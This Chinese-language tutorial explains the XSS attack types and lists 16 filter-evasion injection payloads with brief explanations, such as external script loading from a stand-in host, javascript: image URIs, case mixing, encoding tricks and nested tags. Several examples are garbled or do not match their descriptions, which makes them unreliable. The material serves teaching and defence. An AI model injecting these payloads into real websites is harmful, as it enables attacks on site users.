XSS跨站攻击，注入代码整理，大全

### XSS跨站攻击详解与注入代码实例 #### 一、XSS概述 XSS（Cross Site Scripting）即跨站脚本攻击，是一种常见的Web安全漏洞。它通过将恶意脚本注入到看似可信的网站中，进而攻击最终用户。XSS攻击主要分为三种类型：存储型XSS、反射型XSS以及DOM-based XSS。 - **存储型XSS**：恶意脚本被永久存储在目标服务器上，如数据库或文件系统中。 - **反射型XSS**：恶意脚本通常通过URL参数传递，当用户访问该链接时，恶意脚本会被返回并在用户的浏览器中执行。 - **DOM-based XSS**：这种类型的XSS攻击是通过修改客户端的DOM来实现的，恶意脚本并不会被服务器处理或响应。 #### 二、XSS注入技术与示例 接下来，我们将详细介绍并解析上述文件中的XSS注入代码示例，以便更好地理解各种XSS攻击方式和技术。 ##### 1. 通过`<script>`标签注入外部JS文件 ```html <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> ``` 这种方式通过`<script>`标签引入外部JS文件，当用户浏览含有此标签的网页时，外部JS文件将会被执行。 ##### 2. 使用`<img>`标签注入JavaScript ```html <IMG SRC=javascript:alert(XSS)> ``` 利用`<img>`标签的`src`属性注入JavaScript，这种方式可以绕过某些简单的过滤机制。 ##### 3. 小写和大写字母混合使用 ```html <IMG SRC=JaVaScRiPt:alert(XSS)> ``` 通过改变字母大小写来尝试绕过一些基于关键字的过滤规则。 ##### 4. HTML实体编码 ```html <IMG SRC=javascript:alert(XSS)> ``` 虽然示例代码中没有明确展示，但可以通过HTML实体编码如`&lt;script&gt;`等来绕过过滤器。 ##### 5. 缺少`<img>`标签闭合符 ```html <IMG"><SCRIPT>alert(XSS)</SCRIPT>> ``` 通过不闭合`<img>`标签，并在之后插入`<script>`标签的方式，尝试触发XSS漏洞。 ##### 6. 使用`String.fromCharCode()`方法 ```html <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> ``` 利用`String.fromCharCode()`方法将ASCII码转换为字符串，从而生成恶意脚本。 ##### 7. UTF-8 Unicode编码 ```html <IMG SRC=jav..ʡ..S'> ``` 使用UTF-8 Unicode编码来表示JavaScript关键字，以此绕过基于字符串匹配的过滤。 ##### 8. 特殊字符编码 ```html <IMG SRC=&#x6A&#x61&#x76&#x61..ʡ..&#x58&#x53&#x53&#x27&#x29> ``` 通过特殊字符编码来表示JavaScript关键字，例如使用十六进制`&#xHH;`编码。 ##### 9. 使用`eval()`函数 ```html <SCRIPT>eval("alert('XSS');")</SCRIPT> ``` 利用`eval()`函数执行任意JavaScript代码。 ##### 10. 使用`document.write()` ```html <script>document.write("<script>alert('XSS');</script>");</script> ``` 通过`document.write()`动态生成包含恶意脚本的HTML代码。 ##### 11. 使用Perl生成恶意代码 ```perl perl -e 'print "<IMG SRC=javascript:alert(\'XSS\')>";' > out ``` 通过Perl脚本生成恶意的HTML代码，并将其保存到文件中。 ##### 12. 字符零宽度联合使用 ```html <IMG SRC=javascript:alert(XSS)> ``` 虽然示例中未明确展示，但可以利用零宽度字符如`\0`进行尝试。 ##### 13. 使用空格绕过过滤 ```html <IMG SRC=javascript:alert(XSS);> ``` 通过在关键部分加入空格来尝试绕过过滤。 ##### 14. 使用非字母数字字符 ```html <SCRIPT/XSSSRC=http://3w.org/XSS/xss.js></SCRIPT> ``` 利用非字母数字字符如`/`来尝试绕过过滤。 ##### 15. 使用多层嵌套 ```html <<SCRIPT>alert(XSS);//<</SCRIPT> ``` 通过多层嵌套`<script>`标签来尝试绕过过滤。 ##### 16. 使用注释和转义字符 ```html <SCRIPT SRC=http://3w.org/XSS/xss.js?><B> ``` 利用注释和转义字符来隐藏恶意代码。 #### 三、总结 以上列举了多种XSS攻击手段及相应的示例代码，这些技术可以帮助我们了解XSS攻击的具体实现方式。对于开发人员而言，掌握这些攻击方法有助于提高网站的安全性，避免成为XSS攻击的目标。同时，对于安全研究人员来说，深入研究这些技术能够帮助他们更好地识别和防范此类攻击。 XSS攻击是一种常见的安全威胁，防范措施主要包括对输入数据进行严格的过滤和验证、使用安全的编码实践以及定期进行安全审计。只有不断学习最新的安全技术和防御策略，才能有效抵御这类攻击。